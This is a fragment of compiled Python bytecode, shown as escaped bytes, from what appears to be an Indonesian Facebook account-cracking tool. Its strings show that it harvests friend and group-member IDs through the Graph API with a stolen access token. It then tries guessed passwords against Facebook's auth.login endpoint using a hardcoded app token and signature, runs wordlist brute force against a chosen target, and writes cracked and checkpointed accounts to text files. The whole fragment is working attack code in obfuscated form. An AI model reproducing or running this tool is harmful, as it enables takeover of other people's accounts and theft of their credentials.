\x00d!\x00g\x03\x00}\x0c\x00x0\x00|\x0c\x00D](\x00}\r\x00d"\x00|\r\x00\x17Gt\x13\x00j\x14\x00j\x15\x00\x83\x00\x00\x01t\x16\x00j\x17\x00d#\x00\x83\x01\x00\x01q\xd8\x02WHd$\x00d%\x00\x14GHd&\x00\x84\x00\x00}\x0e\x00t\x18\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x19\x00|\x0e\x00t\x0c\x00\x83\x02\x00\x01d$\x00d%\x00\x14GHd(\x00GHd)\x00t\x11\x00t\x12\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x11\x00t\x12\x00t\x1b\x00\x83\x01\x00\x83\x01\x00\x17GHd+\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R&\x00\x00\x00s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00Rj\x00\x00\x00R9\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] 
Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all id from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=Rs\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=R:\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s0\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97mi\x01\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90c\x01\x00\x00\x00\x0e\x00\x00\x00\x05\x00\x00\x00S\x00\x00\x00sZ\x05\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy!\x05t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\x03\x00\x17t\x05\x00\x17\x83\x01\x00}\x02\x00t\x06\x00j\x07\x00|\x02\x00j\x08\x00\x83\x01\x00}\x03\x00|\x03\x00d\x04\x00\x19d\x05\x00\x17}\x04\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x04\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x05\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01nF\x04d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00r[\x01t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|
\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x04\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\xf0\x03d\x14\x00}\n\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\n\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\n\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01nN\x03d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x02t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\n\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01n\xf8\x02|\x03\x00d\x04\x00\x19d\x15\x00\x17}\x0b\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0b\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x02t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0b\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01nN\x02d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x03t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0b\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01n\xf8\x01d\x16\x00}\x0c\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0c\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x03t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x
07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0c\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01nV\x01d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x04t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0c\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01n\x00\x01|\x03\x00d\x17\x00\x19d\x05\x00\x17}\r\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\r\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x04t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\r\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01nV\x00d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x05t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\r\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x18\x00\x00\x00NR\x90\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0f\x00\x00\x00/?access_token=R\xb2\x00\x00\x00R\xb7\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x1e\x00\x00\x00\x1b[1;97m[ \x1b[1;92mDone\x1b[1;97m ] R\xd4\x00\x00\x00s\x03\x00\x00\x00 
=>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x10\x00\x00\x00out/super_cp.txtRm\x00\x00\x00s\x01\x00\x00\x00\nR\xb5\x00\x00\x00R\xb3\x00\x00\x00t\x07\x00\x00\x00gantengR\xb6\x00\x00\x00(\x12\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00t\x03\x00\x00\x00oksR\x94\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R\xdb\x00\x00\x00(\x0e\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userRm\x00\x00\x00R\xe1\x00\x00\x00t\x05\x00\x00\x00pass1Rl\x00\x00\x00R~\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00t\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00main;\x05\x00\x00s\x96\x00\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x02\x1b\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal OK/CP \x1b[1;91m: \x1b[1;92ms\x0f\x00\x00\x00\x1b[1;97m/\x1b[1;93ms@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCP File saved \x1b[1;91m: \x1b[1;97mout/super_cp.txt(\x1c\x00\x00\x00R/\x00\x00\x00R\xe3\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R 
\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00Rj\x00\x00\x00R\x94\x00\x00\x00R,\x00\x00\x00R\xae\x00\x00\x00Rv\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00mapR\xe5\x00\x00\x00R\xdb\x00\x00\x00(\x0f\x00\x00\x00t\x04\x00\x00\x00peakR\'\x00\x00\x00R\x1e\x00\x00\x00R\xa2\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x13\x00\x00\x00t\x03\x00\x00\x00idgR\xa0\x00\x00\x00R\xa1\x00\x00\x00t\x01\x00\x00\x00pR!\x00\x00\x00R"\x00\x00\x00R\xed\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xe3\x00\x00\x00\xfc\x04\x00\x00s\x88\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\n\x01\x13\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\n\x02\x05\x01\x07\x02\x15\x01\n\x01\x0f\x01\r\x01\x08\x00\r\x00\x11\x01\x01\x01\t\x04\t]\x0c\x01\x10\x01\t\x01\x05\x01)\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x8f\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHy\xf9\x01t\n\x00d\x07\x00\x83\x01\x00}\x00\x00t\n\x00d\x08\x00\x83\x01\x00}\x01\x00t\x02\x00|\x01\x00d\x03\x00\x83\x02\x00}\x02\x00|\x02\x00j\x0b\x00\x83\x00\x00}\x02\x00d\t\x00d\n\x00\x14GHd\x0b\x00|\x00\x00\x17GHd\x0c\x00t\x0c\x00t\r\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\r\x00\x17GHt\x0e\x00d\x0e\x00\x83\x01\x00\x01t\x02\x00|\x
01\x00d\x03\x00\x83\x02\x00}\x03\x00x{\x01|\x03\x00D]s\x01}\x04\x00yA\x01|\x04\x00j\x0f\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x04\x00t\x10\x00j\x11\x00j\x12\x00d\x11\x00|\x04\x00\x17\x83\x01\x00\x01t\x10\x00j\x11\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x12\x00|\x00\x00\x17d\x13\x00\x17|\x04\x00\x17d\x14\x00\x17\x83\x01\x00}\x05\x00t\x16\x00j\x17\x00|\x05\x00j\x18\x00\x83\x01\x00}\x06\x00d\x15\x00|\x06\x00k\x06\x00r\xc8\x01t\x02\x00d\x16\x00d\x17\x00\x83\x02\x00}\x07\x00|\x07\x00j\x12\x00|\x00\x00d\x18\x00\x17|\x04\x00\x17d\x0f\x00\x17\x83\x01\x00\x01|\x07\x00j\x19\x00\x83\x00\x00\x01d\x19\x00GHd\t\x00d\n\x00\x14GHd\x1a\x00|\x00\x00\x17GHd\x1b\x00|\x04\x00\x17GHt\x1a\x00\x83\x00\x00\x01nq\x00d\x1c\x00|\x06\x00d\x1d\x00\x19k\x06\x00r9\x02t\x02\x00d\x1e\x00d\x17\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x00\x00d\x18\x00\x17|\x04\x00\x17d\x0f\x00\x17\x83\x01\x00\x01|\x08\x00j\x19\x00\x83\x00\x00\x01d\x19\x00GHd\t\x00d\n\x00\x14GHd\x1f\x00GHd\x1a\x00|\x00\x00\x17GHd\x1b\x00|\x04\x00\x17GHt\x1a\x00\x83\x00\x00\x01n\x00\x00Wq\xf3\x00\x04t\x14\x00j\x1b\x00j\x1c\x00k\n\x00re\x02\x01\x01\x01d \x00GHt\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01q\xf3\x00Xq\xf3\x00WWn\x1d\x00\x04t\x05\x00k\n\x00r\x8a\x02\x01\x01\x01d!\x00GHt\x1d\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S("\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sX\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m s@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97mi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s9\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m s\x1f\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m s\x10\x00\x00\x00 \x1b[1;92mPasswords$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x01\x00\x00\x00\nR\n\x00\x00\x00s9\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m: \x1b[1;97ms\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\t\x00\x00\x00Brute.txtR\x11\x00\x00\x00s\x03\x00\x00\x00 | s\x18\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mFounds-\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m s-\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x11\x00\x00\x00Brutecekpoint.txts$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x1b\x00\x00\x00\x1b[1;91m[!] Connection Errors\x19\x00\x00\x00\x1b[1;91m[!] 
File not found(\x1e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\t\x00\x00\x00readlinesR\x17\x00\x00\x00R\x0e\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x19\x00\x00\x00R\x1b\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x08\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00t\x06\x00\x00\x00tanyaw(\t\x00\x00\x00R?\x00\x00\x00R\xcb\x00\x00\x00t\x05\x00\x00\x00totalt\x05\x00\x00\x00sandit\x02\x00\x00\x00pwRl\x00\x00\x00R\xdf\x00\x00\x00t\x05\x00\x00\x00dapatt\x04\x00\x00\x00ceks(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaf\x00\x00\x00\xa3\x05\x00\x00sh\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x03\x01\x0c\x01\x0c\x01\x0f\x01\x0c\x01\t\x01\t\x01\x19\x01\n\x01\x0f\x01\r\x01\x03\x01\x12\x01\x14\x01\r\x01\x1f\x01\x12\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x05\x01\t\x01\t\x01\t\x01\n\x01\x10\x01\x0f\x01\x19\x01\n\x01\x05\x01\t\x01\x05\x01\t\x01\t\x01\x0e\x01\x13\x01\x05\x01\x19\x01\r\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x8f\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x02\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x03\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x08\x00\x00\x00Ns@\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate wordlist ? \x1b[1;92m[y/n]\x1b[1;91m:\x1b[1;97m R\n\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] 
WrongRo\x00\x00\x00t\x01\x00\x00\x00YR\xa8\x00\x00\x00t\x01\x00\x00\x00N(\x04\x00\x00\x00R/\x00\x00\x00R\xf3\x00\x00\x00t\x08\x00\x00\x00wordlistRv\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00why(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xf3\x00\x00\x00\xd9\x05\x00\x00s\x1c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x9b\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\r\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m With list friends7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Clone from friends=\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Clone from member groups0\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Using files*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00yahoo_pilih(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xb0\x00\x00\x00\xec\x05\x00\x00s"\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\t\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] 
WrongR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R:\x00\x00\x00(\x07\x00\x00\x00R/\x00\x00\x00R\xfd\x00\x00\x00t\x0c\x00\x00\x00yahoofriendst\x10\x00\x00\x00yahoofromfriendst\x0b\x00\x00\x00yahoomembert\t\x00\x00\x00yahoolistRv\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00go(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfd\x00\x00\x00\x00\x06\x00\x00s 